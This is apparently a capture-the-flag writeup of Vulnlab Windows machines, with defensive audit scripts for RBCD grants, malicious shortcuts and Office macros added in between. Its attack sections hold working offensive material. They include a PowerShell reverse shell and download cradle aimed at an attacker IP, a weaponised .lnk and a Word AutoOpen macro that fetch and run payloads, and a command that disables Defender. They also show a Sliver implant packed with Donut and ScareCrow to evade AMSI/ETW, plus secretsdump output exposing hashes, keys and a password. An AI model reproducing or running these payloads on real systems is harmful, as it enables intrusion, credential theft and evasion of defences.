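The write above (Georgia.Price adding MS01$ to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of WS01$) is what a domain controller with Directory Service Changes auditing enabled records as Security event 5136. The script below is an added example, not part of this writeup: it audits such records, extracts the trustee SIDs from the attribute value (assumed here to be logged as an SDDL string), and rates writes by accounts that do not normally manage delegation as high. The sample records and their timestamps are constructed; the MS01$ SID is the one printed by impacket-rbcd above.

```python
"""Audit of RBCD grants from Directory Service Changes events (added example,
not part of this writeup)."""
import re
from typing import Dict, List, Optional, Set

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
OP_VALUE_ADDED = "%%14674"     # OperationType code for "Value Added" in event 5136
OP_VALUE_DELETED = "%%14675"   # "Value Deleted"

# One ACE inside an SDDL string: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(
    r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);"
    r"(?P<oguid>[^;]*);(?P<iguid>[^;]*);(?P<sid>[^)]*)\)"
)


def trustees_from_sddl(sddl: str) -> List[str]:
    """SIDs granted access by the DACL of an SDDL security descriptor.

    Only access-allowed ("A") ACEs count: those are the accounts that may
    obtain service tickets for the computer via S4U2Proxy.
    """
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    return [m["sid"] for m in ACE_RE.finditer(dacl) if m["type"] == "A"]


def audit_rbcd_events(events: List[Dict[str, str]], sid_names: Dict[str, str],
                      expected_actors: Optional[Set[str]] = None) -> List[Dict[str, object]]:
    """Return one finding per value added to msDS-AllowedToActOnBehalfOfOtherIdentity.

    events: 5136 records as flat dicts (field names follow the Windows event
            schema; the values logged as SDDL is an assumption of this example).
    sid_names: SID -> account name, e.g. from an LDAP export.
    expected_actors: accounts that legitimately manage delegation; a write by
            anyone else is rated "high" instead of "review".
    """
    expected = {a.lower() for a in (expected_actors or set())}
    findings: List[Dict[str, object]] = []
    for ev in events:
        if ev.get("EventID") != "5136":
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTR.lower():
            continue
        if ev.get("OperationType") != OP_VALUE_ADDED:
            continue      # a deletion is clean-up, not a new grant
        actor_user = ev.get("SubjectUserName", "")
        sids = trustees_from_sddl(ev.get("AttributeValue", ""))
        findings.append({
            "time": ev.get("TimeCreated", ""),
            "target": ev.get("ObjectDN", ""),
            "allowed_to_act": [sid_names.get(s, s) for s in sids],
            "actor": f"{ev.get('SubjectDomainName', '')}\\{actor_user}",
            "severity": "review" if actor_user.lower() in expected else "high",
        })
    return findings


# Constructed sample records (timestamps invented); the SID is MS01$ as printed by impacket-rbcd.
WS01_DN = "CN=WS01,CN=Computers,DC=reflection,DC=vl"
MS01_SID = "S-1-5-21-3375389138-1770791787-1490854311-1104"
GRANT_SDDL = f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{MS01_SID})"
SAMPLE_EVENTS = [
    {"EventID": "5136", "TimeCreated": "2024-07-19T09:50:12",       # the RBCD write
     "SubjectUserName": "Georgia.Price", "SubjectDomainName": "REFLECTION",
     "ObjectDN": WS01_DN, "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "AttributeValue": GRANT_SDDL,
     "OperationType": OP_VALUE_ADDED},
    {"EventID": "5136", "TimeCreated": "2024-07-19T09:51:00",       # unrelated attribute
     "SubjectUserName": "Georgia.Price", "SubjectDomainName": "REFLECTION",
     "ObjectDN": WS01_DN, "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "workstation",
     "OperationType": OP_VALUE_ADDED},
    {"EventID": "5136", "TimeCreated": "2024-07-19T11:00:00",       # grant removed again
     "SubjectUserName": "Administrator", "SubjectDomainName": "REFLECTION",
     "ObjectDN": WS01_DN, "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "AttributeValue": GRANT_SDDL,
     "OperationType": OP_VALUE_DELETED},
]
SID_NAMES = {MS01_SID: "MS01$"}

if __name__ == "__main__":
    for f in audit_rbcd_events(SAMPLE_EVENTS, SID_NAMES, expected_actors={"Administrator"}):
        print(f)
```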

and a secretsdump of ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

vulnlab-sidecar

a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

Create a malicious link file on a Windows PC

I used this command:

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>
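From the defender's side, the problem above is a share that any domain user can write to and that a simulated user browses. As an added example (not part of the original writeup), here is a PowerShell audit a defender could run against such a share to list every .lnk and flag shortcuts whose target is an interpreter or whose arguments contain a download cradle. The share path and the marker lists are assumptions chosen for illustration.

```powershell
# Added example (not from the original writeup): audit every .lnk in a share and
# flag shortcuts that launch an interpreter or carry a download cradle.
# The share path and the marker lists below are assumptions for illustration.
$SharePath = '\\DC01.sidecar.vl\Public'   # assumption: the share used in the writeup

# WScript.Shell resolves a shortcut's target and arguments without running it
$shell = New-Object -ComObject WScript.Shell

# Interpreters a shortcut in a shared folder rarely has a legitimate reason to launch
$interpreters = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe',
                  'wscript.exe', 'cscript.exe', 'rundll32.exe', 'certutil.exe')

# Substrings typical of download-and-execute one-liners (matched case-insensitively)
$cradleMarkers = @('iex', 'invoke-expression', 'downloadstring', 'downloaddata',
                   'iwr', 'invoke-webrequest', 'webclient', 'http://', 'https://')

function Test-SuspiciousShortcut {
    param([Parameter(Mandatory)][string]$Path)

    $lnk       = $shell.CreateShortcut($Path)
    $target    = [string]$lnk.TargetPath
    $arguments = [string]$lnk.Arguments
    $targetExe = [System.IO.Path]::GetFileName($target).ToLowerInvariant()
    $argsLower = $arguments.ToLowerInvariant()

    $reasons = @()
    if ($interpreters -contains $targetExe) { $reasons += "target is $targetExe" }
    foreach ($m in $cradleMarkers) {
        if ($argsLower.Contains($m)) { $reasons += "arguments contain '$m'"; break }
    }

    [pscustomobject]@{
        Path       = $Path
        Target     = $target
        Arguments  = $arguments
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

# Walk the share, evaluate each shortcut, and list the suspicious ones first
Get-ChildItem -Path $SharePath -Recurse -Filter '*.lnk' -File -ErrorAction SilentlyContinue |
    ForEach-Object { Test-SuspiciousShortcut -Path $_.FullName } |
    Sort-Object -Property Suspicious -Descending |
    Format-Table -AutoSize -Property Suspicious, Path, Target, Reasons
```

Run it from a host with read access to the share. The legitimate Common.lnk, Install.lnk and Transfer.lnk shortcuts listed earlier should resolve to folders and come out clean, while a dropped shortcut whose target is cmd.exe or powershell.exe with "IEX" and "DownloadData" in its arguments is flagged. The lasting fix is the share ACL: users should not be able to write into a folder that a privileged account opens on a schedule.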

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

So we have the following local and domain users:

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let’s donut this file

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then Scarecrow the file

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

Got a session, but after uploading SharpHound.exe, my sliver session gets disconnected.

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new .lnk file:

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

To be continued …

vulnlab-job2

job2: a hard Windows machine, from phishing to admin

Preparation

1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension, since it won’t allow for embedded macros. Use either .doc or .docm.

Do the testing on your LAN first (a Kali box and a Windows 11 PC).

I used this macro:

Sub AutoOpen()

  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open puck3.docm twice: the first time to download rcat, the second time to execute rcat.exe.

If you receive a reverse shell, start the job2 box and move on to job2.
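The preparation steps above rely on two things a defender can check directly: the attachment carries a VBA project (the .doc/.docm requirement), and the victim's macro policy lets it run. As an added example (not part of the original writeup), here is a PowerShell check that reports whether a document contains a vbaProject.bin part and what the current user's Word macro policy is. The sample file name is an assumption; so is Office version 16.0, and machine-wide HKLM policy keys are not read.

```powershell
# Added example (not from the original writeup): a defender-side check that reports
# whether an Office document carries a VBA project, and whether the current user's
# Word macro policy would block it. The sample file name is an assumption.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Get-OfficeMacroInfo {
    param([Parameter(Mandatory)][string]$Path)

    $full = (Resolve-Path -Path $Path).ProviderPath

    # Sniff the container from the first 8 bytes: OLE2 (legacy .doc) or zip (OOXML)
    $fs = [System.IO.File]::OpenRead($full)
    try { $hdr = New-Object byte[] 8; $null = $fs.Read($hdr, 0, 8) } finally { $fs.Dispose() }
    $oleMagic = [byte[]](0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1)
    $isOle = (($hdr -join ',') -eq ($oleMagic -join ','))
    $isZip = ($hdr[0] -eq 0x50 -and $hdr[1] -eq 0x4B)

    $hasVba  = $null   # $null = not inspected (legacy OLE2 needs a VBA stream parser such as olevba)
    $vbaSize = 0
    if ($isZip) {
        # OOXML (.docm/.docx/.xlsm/.pptm) is a zip; macros live in a vbaProject.bin part
        $zip = [System.IO.Compression.ZipFile]::OpenRead($full)
        try {
            $vba = $zip.Entries | Where-Object { $_.FullName -match '(?i)vbaProject\.bin$' } | Select-Object -First 1
            $hasVba = [bool]$vba
            if ($vba) { $vbaSize = $vba.Length }
        } finally { $zip.Dispose() }
    }

    [pscustomobject]@{
        Path          = $full
        Extension     = [System.IO.Path]::GetExtension($full).ToLowerInvariant()
        Container     = if ($isOle) { 'OLE2' } elseif ($isZip) { 'OOXML' } else { 'unknown' }
        HasVbaProject = $hasVba
        VbaSizeBytes  = $vbaSize
    }
}

function Get-WordMacroPolicy {
    # VBAWarnings: 1 = enable all, 2 = disable with notification (the default),
    # 3 = disable except digitally signed, 4 = disable all without notification.
    # Assumption: Office 16.0 (2016 and later); machine-wide HKLM policy keys are not read here.
    $userKey   = 'HKCU:\Software\Microsoft\Office\16.0\Word\Security'
    $policyKey = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security'

    $warn = (Get-ItemProperty -Path $policyKey -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
    if ($null -eq $warn) {
        $warn = (Get-ItemProperty -Path $userKey -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
    }
    if ($null -eq $warn) { $warn = 2 }

    # blockcontentexecutionfrominternet = 1 blocks macros in files carrying the Mark-of-the-Web
    $motw = (Get-ItemProperty -Path $policyKey -Name blockcontentexecutionfrominternet -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet

    [pscustomobject]@{
        VBAWarnings            = $warn
        MacrosBlockedByDefault = ($warn -ge 3)
        InternetMacrosBlocked  = ($motw -eq 1)
    }
}

# Usage (file name is an assumption): an attachment like the writeup's puck3.docm
Get-OfficeMacroInfo -Path '.\puck3.docm' | Format-List
Get-WordMacroPolicy | Format-List
```

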